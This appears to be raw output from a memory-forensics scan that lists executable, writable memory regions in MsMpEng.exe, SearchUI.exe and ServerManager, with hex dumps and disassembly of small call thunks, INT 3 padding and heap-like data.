0x00000202d78a0000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d78a0010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d78a0020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d78a0030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d78a0000 55 PUSH EBP
0x00000000d78a0001 48 DEC EAX
0x00000000d78a0002 8d2c24 LEA EBP, [ESP]
0x00000000d78a0005 48 DEC EAX
0x00000000d78a0006 83ec20 SUB ESP, 0x20
0x00000000d78a0009 48 DEC EAX
0x00000000d78a000a 8b01 MOV EAX, [ECX]
0x00000000d78a000c 48 DEC EAX
0x00000000d78a000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d78a0010 ffd0 CALL EAX
0x00000000d78a0012 48 DEC EAX
0x00000000d78a0013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d78a0016 5d POP EBP
0x00000000d78a0017 c3 RET
0x00000000d78a0018 cc INT 3
0x00000000d78a0019 cc INT 3
0x00000000d78a001a cc INT 3
0x00000000d78a001b cc INT 3
0x00000000d78a001c cc INT 3
0x00000000d78a001d cc INT 3
0x00000000d78a001e cc INT 3
0x00000000d78a001f cc INT 3
0x00000000d78a0020 cc INT 3
0x00000000d78a0021 cc INT 3
0x00000000d78a0022 cc INT 3
0x00000000d78a0023 cc INT 3
0x00000000d78a0024 cc INT 3
0x00000000d78a0025 cc INT 3
0x00000000d78a0026 cc INT 3
0x00000000d78a0027 cc INT 3
0x00000000d78a0028 cc INT 3
0x00000000d78a0029 cc INT 3
0x00000000d78a002a cc INT 3
0x00000000d78a002b cc INT 3
0x00000000d78a002c cc INT 3
0x00000000d78a002d cc INT 3
0x00000000d78a002e cc INT 3
0x00000000d78a002f cc INT 3
0x00000000d78a0030 cc INT 3
0x00000000d78a0031 cc INT 3
0x00000000d78a0032 cc INT 3
0x00000000d78a0033 cc INT 3
0x00000000d78a0034 cc INT 3
0x00000000d78a0035 cc INT 3
0x00000000d78a0036 cc INT 3
0x00000000d78a0037 cc INT 3
0x00000000d78a0038 cc INT 3
0x00000000d78a0039 cc INT 3
0x00000000d78a003a cc INT 3
0x00000000d78a003b cc INT 3
0x00000000d78a003c cc INT 3
0x00000000d78a003d cc INT 3
0x00000000d78a003e cc INT 3
0x00000000d78a003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d7980000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d7980000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d7980010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d7980020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d7980030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d7980000 55 PUSH EBP
0x00000000d7980001 48 DEC EAX
0x00000000d7980002 8d2c24 LEA EBP, [ESP]
0x00000000d7980005 48 DEC EAX
0x00000000d7980006 83ec20 SUB ESP, 0x20
0x00000000d7980009 48 DEC EAX
0x00000000d798000a 8b01 MOV EAX, [ECX]
0x00000000d798000c 48 DEC EAX
0x00000000d798000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d7980010 ffd0 CALL EAX
0x00000000d7980012 48 DEC EAX
0x00000000d7980013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d7980016 5d POP EBP
0x00000000d7980017 c3 RET
0x00000000d7980018 cc INT 3
0x00000000d7980019 cc INT 3
0x00000000d798001a cc INT 3
0x00000000d798001b cc INT 3
0x00000000d798001c cc INT 3
0x00000000d798001d cc INT 3
0x00000000d798001e cc INT 3
0x00000000d798001f cc INT 3
0x00000000d7980020 cc INT 3
0x00000000d7980021 cc INT 3
0x00000000d7980022 cc INT 3
0x00000000d7980023 cc INT 3
0x00000000d7980024 cc INT 3
0x00000000d7980025 cc INT 3
0x00000000d7980026 cc INT 3
0x00000000d7980027 cc INT 3
0x00000000d7980028 cc INT 3
0x00000000d7980029 cc INT 3
0x00000000d798002a cc INT 3
0x00000000d798002b cc INT 3
0x00000000d798002c cc INT 3
0x00000000d798002d cc INT 3
0x00000000d798002e cc INT 3
0x00000000d798002f cc INT 3
0x00000000d7980030 cc INT 3
0x00000000d7980031 cc INT 3
0x00000000d7980032 cc INT 3
0x00000000d7980033 cc INT 3
0x00000000d7980034 cc INT 3
0x00000000d7980035 cc INT 3
0x00000000d7980036 cc INT 3
0x00000000d7980037 cc INT 3
0x00000000d7980038 cc INT 3
0x00000000d7980039 cc INT 3
0x00000000d798003a cc INT 3
0x00000000d798003b cc INT 3
0x00000000d798003c cc INT 3
0x00000000d798003d cc INT 3
0x00000000d798003e cc INT 3
0x00000000d798003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d7970000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d7970000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d7970010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d7970020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d7970030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d7970000 55 PUSH EBP
0x00000000d7970001 48 DEC EAX
0x00000000d7970002 8d2c24 LEA EBP, [ESP]
0x00000000d7970005 48 DEC EAX
0x00000000d7970006 83ec20 SUB ESP, 0x20
0x00000000d7970009 48 DEC EAX
0x00000000d797000a 8b01 MOV EAX, [ECX]
0x00000000d797000c 48 DEC EAX
0x00000000d797000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d7970010 ffd0 CALL EAX
0x00000000d7970012 48 DEC EAX
0x00000000d7970013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d7970016 5d POP EBP
0x00000000d7970017 c3 RET
0x00000000d7970018 cc INT 3
0x00000000d7970019 cc INT 3
0x00000000d797001a cc INT 3
0x00000000d797001b cc INT 3
0x00000000d797001c cc INT 3
0x00000000d797001d cc INT 3
0x00000000d797001e cc INT 3
0x00000000d797001f cc INT 3
0x00000000d7970020 cc INT 3
0x00000000d7970021 cc INT 3
0x00000000d7970022 cc INT 3
0x00000000d7970023 cc INT 3
0x00000000d7970024 cc INT 3
0x00000000d7970025 cc INT 3
0x00000000d7970026 cc INT 3
0x00000000d7970027 cc INT 3
0x00000000d7970028 cc INT 3
0x00000000d7970029 cc INT 3
0x00000000d797002a cc INT 3
0x00000000d797002b cc INT 3
0x00000000d797002c cc INT 3
0x00000000d797002d cc INT 3
0x00000000d797002e cc INT 3
0x00000000d797002f cc INT 3
0x00000000d7970030 cc INT 3
0x00000000d7970031 cc INT 3
0x00000000d7970032 cc INT 3
0x00000000d7970033 cc INT 3
0x00000000d7970034 cc INT 3
0x00000000d7970035 cc INT 3
0x00000000d7970036 cc INT 3
0x00000000d7970037 cc INT 3
0x00000000d7970038 cc INT 3
0x00000000d7970039 cc INT 3
0x00000000d797003a cc INT 3
0x00000000d797003b cc INT 3
0x00000000d797003c cc INT 3
0x00000000d797003d cc INT 3
0x00000000d797003e cc INT 3
0x00000000d797003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d79a0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d79a0000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d79a0010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d79a0020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d79a0030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d79a0000 55 PUSH EBP
0x00000000d79a0001 48 DEC EAX
0x00000000d79a0002 8d2c24 LEA EBP, [ESP]
0x00000000d79a0005 48 DEC EAX
0x00000000d79a0006 83ec20 SUB ESP, 0x20
0x00000000d79a0009 48 DEC EAX
0x00000000d79a000a 8b01 MOV EAX, [ECX]
0x00000000d79a000c 48 DEC EAX
0x00000000d79a000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d79a0010 ffd0 CALL EAX
0x00000000d79a0012 48 DEC EAX
0x00000000d79a0013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d79a0016 5d POP EBP
0x00000000d79a0017 c3 RET
0x00000000d79a0018 cc INT 3
0x00000000d79a0019 cc INT 3
0x00000000d79a001a cc INT 3
0x00000000d79a001b cc INT 3
0x00000000d79a001c cc INT 3
0x00000000d79a001d cc INT 3
0x00000000d79a001e cc INT 3
0x00000000d79a001f cc INT 3
0x00000000d79a0020 cc INT 3
0x00000000d79a0021 cc INT 3
0x00000000d79a0022 cc INT 3
0x00000000d79a0023 cc INT 3
0x00000000d79a0024 cc INT 3
0x00000000d79a0025 cc INT 3
0x00000000d79a0026 cc INT 3
0x00000000d79a0027 cc INT 3
0x00000000d79a0028 cc INT 3
0x00000000d79a0029 cc INT 3
0x00000000d79a002a cc INT 3
0x00000000d79a002b cc INT 3
0x00000000d79a002c cc INT 3
0x00000000d79a002d cc INT 3
0x00000000d79a002e cc INT 3
0x00000000d79a002f cc INT 3
0x00000000d79a0030 cc INT 3
0x00000000d79a0031 cc INT 3
0x00000000d79a0032 cc INT 3
0x00000000d79a0033 cc INT 3
0x00000000d79a0034 cc INT 3
0x00000000d79a0035 cc INT 3
0x00000000d79a0036 cc INT 3
0x00000000d79a0037 cc INT 3
0x00000000d79a0038 cc INT 3
0x00000000d79a0039 cc INT 3
0x00000000d79a003a cc INT 3
0x00000000d79a003b cc INT 3
0x00000000d79a003c cc INT 3
0x00000000d79a003d cc INT 3
0x00000000d79a003e cc INT 3
0x00000000d79a003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d7990000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d7990000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d7990010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d7990020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d7990030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d7990000 55 PUSH EBP
0x00000000d7990001 48 DEC EAX
0x00000000d7990002 8d2c24 LEA EBP, [ESP]
0x00000000d7990005 48 DEC EAX
0x00000000d7990006 83ec20 SUB ESP, 0x20
0x00000000d7990009 48 DEC EAX
0x00000000d799000a 8b01 MOV EAX, [ECX]
0x00000000d799000c 48 DEC EAX
0x00000000d799000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d7990010 ffd0 CALL EAX
0x00000000d7990012 48 DEC EAX
0x00000000d7990013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d7990016 5d POP EBP
0x00000000d7990017 c3 RET
0x00000000d7990018 cc INT 3
0x00000000d7990019 cc INT 3
0x00000000d799001a cc INT 3
0x00000000d799001b cc INT 3
0x00000000d799001c cc INT 3
0x00000000d799001d cc INT 3
0x00000000d799001e cc INT 3
0x00000000d799001f cc INT 3
0x00000000d7990020 cc INT 3
0x00000000d7990021 cc INT 3
0x00000000d7990022 cc INT 3
0x00000000d7990023 cc INT 3
0x00000000d7990024 cc INT 3
0x00000000d7990025 cc INT 3
0x00000000d7990026 cc INT 3
0x00000000d7990027 cc INT 3
0x00000000d7990028 cc INT 3
0x00000000d7990029 cc INT 3
0x00000000d799002a cc INT 3
0x00000000d799002b cc INT 3
0x00000000d799002c cc INT 3
0x00000000d799002d cc INT 3
0x00000000d799002e cc INT 3
0x00000000d799002f cc INT 3
0x00000000d7990030 cc INT 3
0x00000000d7990031 cc INT 3
0x00000000d7990032 cc INT 3
0x00000000d7990033 cc INT 3
0x00000000d7990034 cc INT 3
0x00000000d7990035 cc INT 3
0x00000000d7990036 cc INT 3
0x00000000d7990037 cc INT 3
0x00000000d7990038 cc INT 3
0x00000000d7990039 cc INT 3
0x00000000d799003a cc INT 3
0x00000000d799003b cc INT 3
0x00000000d799003c cc INT 3
0x00000000d799003d cc INT 3
0x00000000d799003e cc INT 3
0x00000000d799003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d7ce0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d7ce0000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d7ce0010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d7ce0020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d7ce0030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d7ce0000 55 PUSH EBP
0x00000000d7ce0001 48 DEC EAX
0x00000000d7ce0002 8d2c24 LEA EBP, [ESP]
0x00000000d7ce0005 48 DEC EAX
0x00000000d7ce0006 83ec20 SUB ESP, 0x20
0x00000000d7ce0009 48 DEC EAX
0x00000000d7ce000a 8b01 MOV EAX, [ECX]
0x00000000d7ce000c 48 DEC EAX
0x00000000d7ce000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d7ce0010 ffd0 CALL EAX
0x00000000d7ce0012 48 DEC EAX
0x00000000d7ce0013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d7ce0016 5d POP EBP
0x00000000d7ce0017 c3 RET
0x00000000d7ce0018 cc INT 3
0x00000000d7ce0019 cc INT 3
0x00000000d7ce001a cc INT 3
0x00000000d7ce001b cc INT 3
0x00000000d7ce001c cc INT 3
0x00000000d7ce001d cc INT 3
0x00000000d7ce001e cc INT 3
0x00000000d7ce001f cc INT 3
0x00000000d7ce0020 cc INT 3
0x00000000d7ce0021 cc INT 3
0x00000000d7ce0022 cc INT 3
0x00000000d7ce0023 cc INT 3
0x00000000d7ce0024 cc INT 3
0x00000000d7ce0025 cc INT 3
0x00000000d7ce0026 cc INT 3
0x00000000d7ce0027 cc INT 3
0x00000000d7ce0028 cc INT 3
0x00000000d7ce0029 cc INT 3
0x00000000d7ce002a cc INT 3
0x00000000d7ce002b cc INT 3
0x00000000d7ce002c cc INT 3
0x00000000d7ce002d cc INT 3
0x00000000d7ce002e cc INT 3
0x00000000d7ce002f cc INT 3
0x00000000d7ce0030 cc INT 3
0x00000000d7ce0031 cc INT 3
0x00000000d7ce0032 cc INT 3
0x00000000d7ce0033 cc INT 3
0x00000000d7ce0034 cc INT 3
0x00000000d7ce0035 cc INT 3
0x00000000d7ce0036 cc INT 3
0x00000000d7ce0037 cc INT 3
0x00000000d7ce0038 cc INT 3
0x00000000d7ce0039 cc INT 3
0x00000000d7ce003a cc INT 3
0x00000000d7ce003b cc INT 3
0x00000000d7ce003c cc INT 3
0x00000000d7ce003d cc INT 3
0x00000000d7ce003e cc INT 3
0x00000000d7ce003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d9000000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d9000000 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d9000010 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d9000020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d9000030 cc 08 00 42 00 00 00 00 05 48 8b 45 20 48 89 c2 ...B.....H.E.H..
0x00000000d9000000 cc INT 3
0x00000000d9000001 cc INT 3
0x00000000d9000002 cc INT 3
0x00000000d9000003 cc INT 3
0x00000000d9000004 cc INT 3
0x00000000d9000005 cc INT 3
0x00000000d9000006 cc INT 3
0x00000000d9000007 cc INT 3
0x00000000d9000008 cc INT 3
0x00000000d9000009 cc INT 3
0x00000000d900000a cc INT 3
0x00000000d900000b cc INT 3
0x00000000d900000c cc INT 3
0x00000000d900000d cc INT 3
0x00000000d900000e cc INT 3
0x00000000d900000f cc INT 3
0x00000000d9000010 cc INT 3
0x00000000d9000011 cc INT 3
0x00000000d9000012 cc INT 3
0x00000000d9000013 cc INT 3
0x00000000d9000014 cc INT 3
0x00000000d9000015 cc INT 3
0x00000000d9000016 cc INT 3
0x00000000d9000017 cc INT 3
0x00000000d9000018 cc INT 3
0x00000000d9000019 cc INT 3
0x00000000d900001a cc INT 3
0x00000000d900001b cc INT 3
0x00000000d900001c cc INT 3
0x00000000d900001d cc INT 3
0x00000000d900001e cc INT 3
0x00000000d900001f cc INT 3
0x00000000d9000020 cc INT 3
0x00000000d9000021 cc INT 3
0x00000000d9000022 cc INT 3
0x00000000d9000023 cc INT 3
0x00000000d9000024 cc INT 3
0x00000000d9000025 cc INT 3
0x00000000d9000026 cc INT 3
0x00000000d9000027 cc INT 3
0x00000000d9000028 cc INT 3
0x00000000d9000029 cc INT 3
0x00000000d900002a cc INT 3
0x00000000d900002b cc INT 3
0x00000000d900002c cc INT 3
0x00000000d900002d cc INT 3
0x00000000d900002e cc INT 3
0x00000000d900002f cc INT 3
0x00000000d9000030 cc INT 3
0x00000000d9000031 0800 OR [EAX], AL
0x00000000d9000033 42 INC EDX
0x00000000d9000034 0000 ADD [EAX], AL
0x00000000d9000036 0000 ADD [EAX], AL
0x00000000d9000038 05488b4520 ADD EAX, 0x20458b48
0x00000000d900003d 48 DEC EAX
0x00000000d900003e 89c2 MOV EDX, EAX
Process: MsMpEng.exe Pid: 1876 Address: 0x202dbd20000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202dbd20000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202dbd20010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202dbd20020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202dbd20030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000dbd20000 55 PUSH EBP
0x00000000dbd20001 48 DEC EAX
0x00000000dbd20002 8d2c24 LEA EBP, [ESP]
0x00000000dbd20005 48 DEC EAX
0x00000000dbd20006 83ec20 SUB ESP, 0x20
0x00000000dbd20009 48 DEC EAX
0x00000000dbd2000a 8b01 MOV EAX, [ECX]
0x00000000dbd2000c 48 DEC EAX
0x00000000dbd2000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000dbd20010 ffd0 CALL EAX
0x00000000dbd20012 48 DEC EAX
0x00000000dbd20013 8d6500 LEA ESP, [EBP+0x0]
0x00000000dbd20016 5d POP EBP
0x00000000dbd20017 c3 RET
0x00000000dbd20018 cc INT 3
0x00000000dbd20019 cc INT 3
0x00000000dbd2001a cc INT 3
0x00000000dbd2001b cc INT 3
0x00000000dbd2001c cc INT 3
0x00000000dbd2001d cc INT 3
0x00000000dbd2001e cc INT 3
0x00000000dbd2001f cc INT 3
0x00000000dbd20020 cc INT 3
0x00000000dbd20021 cc INT 3
0x00000000dbd20022 cc INT 3
0x00000000dbd20023 cc INT 3
0x00000000dbd20024 cc INT 3
0x00000000dbd20025 cc INT 3
0x00000000dbd20026 cc INT 3
0x00000000dbd20027 cc INT 3
0x00000000dbd20028 cc INT 3
0x00000000dbd20029 cc INT 3
0x00000000dbd2002a cc INT 3
0x00000000dbd2002b cc INT 3
0x00000000dbd2002c cc INT 3
0x00000000dbd2002d cc INT 3
0x00000000dbd2002e cc INT 3
0x00000000dbd2002f cc INT 3
0x00000000dbd20030 cc INT 3
0x00000000dbd20031 cc INT 3
0x00000000dbd20032 cc INT 3
0x00000000dbd20033 cc INT 3
0x00000000dbd20034 cc INT 3
0x00000000dbd20035 cc INT 3
0x00000000dbd20036 cc INT 3
0x00000000dbd20037 cc INT 3
0x00000000dbd20038 cc INT 3
0x00000000dbd20039 cc INT 3
0x00000000dbd2003a cc INT 3
0x00000000dbd2003b cc INT 3
0x00000000dbd2003c cc INT 3
0x00000000dbd2003d cc INT 3
0x00000000dbd2003e cc INT 3
0x00000000dbd2003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202dbd30000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202dbd30000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202dbd30010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202dbd30020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202dbd30030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000dbd30000 55 PUSH EBP
0x00000000dbd30001 48 DEC EAX
0x00000000dbd30002 8d2c24 LEA EBP, [ESP]
0x00000000dbd30005 48 DEC EAX
0x00000000dbd30006 83ec20 SUB ESP, 0x20
0x00000000dbd30009 48 DEC EAX
0x00000000dbd3000a 8b01 MOV EAX, [ECX]
0x00000000dbd3000c 48 DEC EAX
0x00000000dbd3000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000dbd30010 ffd0 CALL EAX
0x00000000dbd30012 48 DEC EAX
0x00000000dbd30013 8d6500 LEA ESP, [EBP+0x0]
0x00000000dbd30016 5d POP EBP
0x00000000dbd30017 c3 RET
0x00000000dbd30018 cc INT 3
0x00000000dbd30019 cc INT 3
0x00000000dbd3001a cc INT 3
0x00000000dbd3001b cc INT 3
0x00000000dbd3001c cc INT 3
0x00000000dbd3001d cc INT 3
0x00000000dbd3001e cc INT 3
0x00000000dbd3001f cc INT 3
0x00000000dbd30020 cc INT 3
0x00000000dbd30021 cc INT 3
0x00000000dbd30022 cc INT 3
0x00000000dbd30023 cc INT 3
0x00000000dbd30024 cc INT 3
0x00000000dbd30025 cc INT 3
0x00000000dbd30026 cc INT 3
0x00000000dbd30027 cc INT 3
0x00000000dbd30028 cc INT 3
0x00000000dbd30029 cc INT 3
0x00000000dbd3002a cc INT 3
0x00000000dbd3002b cc INT 3
0x00000000dbd3002c cc INT 3
0x00000000dbd3002d cc INT 3
0x00000000dbd3002e cc INT 3
0x00000000dbd3002f cc INT 3
0x00000000dbd30030 cc INT 3
0x00000000dbd30031 cc INT 3
0x00000000dbd30032 cc INT 3
0x00000000dbd30033 cc INT 3
0x00000000dbd30034 cc INT 3
0x00000000dbd30035 cc INT 3
0x00000000dbd30036 cc INT 3
0x00000000dbd30037 cc INT 3
0x00000000dbd30038 cc INT 3
0x00000000dbd30039 cc INT 3
0x00000000dbd3003a cc INT 3
0x00000000dbd3003b cc INT 3
0x00000000dbd3003c cc INT 3
0x00000000dbd3003d cc INT 3
0x00000000dbd3003e cc INT 3
0x00000000dbd3003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202e2430000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202e2430000 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202e2430010 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202e2430020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202e2430030 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00000000e2430000 cc INT 3
0x00000000e2430001 cc INT 3
0x00000000e2430002 cc INT 3
0x00000000e2430003 cc INT 3
0x00000000e2430004 cc INT 3
0x00000000e2430005 cc INT 3
0x00000000e2430006 cc INT 3
0x00000000e2430007 cc INT 3
0x00000000e2430008 cc INT 3
0x00000000e2430009 cc INT 3
0x00000000e243000a cc INT 3
0x00000000e243000b cc INT 3
0x00000000e243000c cc INT 3
0x00000000e243000d cc INT 3
0x00000000e243000e cc INT 3
0x00000000e243000f cc INT 3
0x00000000e2430010 cc INT 3
0x00000000e2430011 cc INT 3
0x00000000e2430012 cc INT 3
0x00000000e2430013 cc INT 3
0x00000000e2430014 cc INT 3
0x00000000e2430015 cc INT 3
0x00000000e2430016 cc INT 3
0x00000000e2430017 cc INT 3
0x00000000e2430018 cc INT 3
0x00000000e2430019 cc INT 3
0x00000000e243001a cc INT 3
0x00000000e243001b cc INT 3
0x00000000e243001c cc INT 3
0x00000000e243001d cc INT 3
0x00000000e243001e cc INT 3
0x00000000e243001f cc INT 3
0x00000000e2430020 cc INT 3
0x00000000e2430021 cc INT 3
0x00000000e2430022 cc INT 3
0x00000000e2430023 cc INT 3
0x00000000e2430024 cc INT 3
0x00000000e2430025 cc INT 3
0x00000000e2430026 cc INT 3
0x00000000e2430027 cc INT 3
0x00000000e2430028 cc INT 3
0x00000000e2430029 cc INT 3
0x00000000e243002a cc INT 3
0x00000000e243002b cc INT 3
0x00000000e243002c cc INT 3
0x00000000e243002d cc INT 3
0x00000000e243002e cc INT 3
0x00000000e243002f cc INT 3
0x00000000e2430030 cc INT 3
0x00000000e2430031 0000 ADD [EAX], AL
0x00000000e2430033 0000 ADD [EAX], AL
0x00000000e2430035 0000 ADD [EAX], AL
0x00000000e2430037 0000 ADD [EAX], AL
0x00000000e2430039 0000 ADD [EAX], AL
0x00000000e243003b 0000 ADD [EAX], AL
0x00000000e243003d 0000 ADD [EAX], AL
0x00000000e243003f 00 DB 0x0
Process: SearchUI.exe Pid: 3408 Address: 0x26a920a0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000026a920a0000 48 89 54 24 10 48 89 4c 24 08 4c 89 44 24 18 4c H.T$.H.L$.L.D$.L
0x0000026a920a0010 89 4c 24 20 48 8b 41 28 48 8b 50 60 48 83 e2 f8 .L$.H.A(H.P`H...
0x0000026a920a0020 48 8b ca 48 b8 58 00 0a 92 6a 02 00 00 48 2b c8 H..H.X...j...H+.
0x0000026a920a0030 48 81 f9 78 0f 00 00 76 09 48 c7 c1 05 00 00 00 H..x...v.H......
0x00000000920a0000 48 DEC EAX
0x00000000920a0001 89542410 MOV [ESP+0x10], EDX
0x00000000920a0005 48 DEC EAX
0x00000000920a0006 894c2408 MOV [ESP+0x8], ECX
0x00000000920a000a 4c DEC ESP
0x00000000920a000b 89442418 MOV [ESP+0x18], EAX
0x00000000920a000f 4c DEC ESP
0x00000000920a0010 894c2420 MOV [ESP+0x20], ECX
0x00000000920a0014 48 DEC EAX
0x00000000920a0015 8b4128 MOV EAX, [ECX+0x28]
0x00000000920a0018 48 DEC EAX
0x00000000920a0019 8b5060 MOV EDX, [EAX+0x60]
0x00000000920a001c 48 DEC EAX
0x00000000920a001d 83e2f8 AND EDX, -0x8
0x00000000920a0020 48 DEC EAX
0x00000000920a0021 8bca MOV ECX, EDX
0x00000000920a0023 48 DEC EAX
0x00000000920a0024 b858000a92 MOV EAX, 0x920a0058
0x00000000920a0029 6a02 PUSH 0x2
0x00000000920a002b 0000 ADD [EAX], AL
0x00000000920a002d 48 DEC EAX
0x00000000920a002e 2bc8 SUB ECX, EAX
0x00000000920a0030 48 DEC EAX
0x00000000920a0031 81f9780f0000 CMP ECX, 0xf78
0x00000000920a0037 7609 JBE 0x920a0042
0x00000000920a0039 48 DEC EAX
0x00000000920a003a c7c105000000 MOV ECX, 0x5
Process: ServerManager. Pid: 2552 Address: 0x29aefd50000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000029aefd50000 00 00 00 00 00 00 00 00 79 c9 95 42 54 98 00 01 ........y..BT...
0x0000029aefd50010 ee ff ee ff 02 00 00 00 20 01 d5 ef 9a 02 00 00 ................
0x0000029aefd50020 20 01 d5 ef 9a 02 00 00 00 00 d5 ef 9a 02 00 00 ................
0x0000029aefd50030 00 00 d5 ef 9a 02 00 00 0f 00 00 00 00 00 00 00 ................
0x00000000efd50000 0000 ADD [EAX], AL
0x00000000efd50002 0000 ADD [EAX], AL
0x00000000efd50004 0000 ADD [EAX], AL
0x00000000efd50006 0000 ADD [EAX], AL
0x00000000efd50008 79c9 JNS 0xefd4ffd3
0x00000000efd5000a 95 XCHG EBP, EAX
0x00000000efd5000b 42 INC EDX
0x00000000efd5000c 54 PUSH ESP
0x00000000efd5000d 98 CWDE
0x00000000efd5000e 0001 ADD [ECX], AL
0x00000000efd50010 ee OUT DX, AL
0x00000000efd50011 ff DB 0xff
0x00000000efd50012 ee OUT DX, AL
0x00000000efd50013 ff02 INC DWORD [EDX]
0x00000000efd50015 0000 ADD [EAX], AL
0x00000000efd50017 0020 ADD [EAX], AH
0x00000000efd50019 01d5 ADD EBP, EDX
0x00000000efd5001b ef OUT DX, EAX
0x00000000efd5001c 9a0200002001d5 CALL FAR 0xd501:0x20000002
0x00000000efd50023 ef OUT DX, EAX
0x00000000efd50024 9a0200000000d5 CALL FAR 0xd500:0x2
0x00000000efd5002b ef OUT DX, EAX
0x00000000efd5002c 9a0200000000d5 CALL FAR 0xd500:0x2
0x00000000efd50033 ef OUT DX, EAX
0x00000000efd50034 9a0200000f0000 CALL FAR 0x0:0xf000002
0x00000000efd5003b 0000 ADD [EAX], AL
0x00000000efd5003d 0000 ADD [EAX], AL
0x00000000efd5003f 00 DB 0x0
Process: ServerManager. Pid: 2552 Address: 0x29aee5c0000
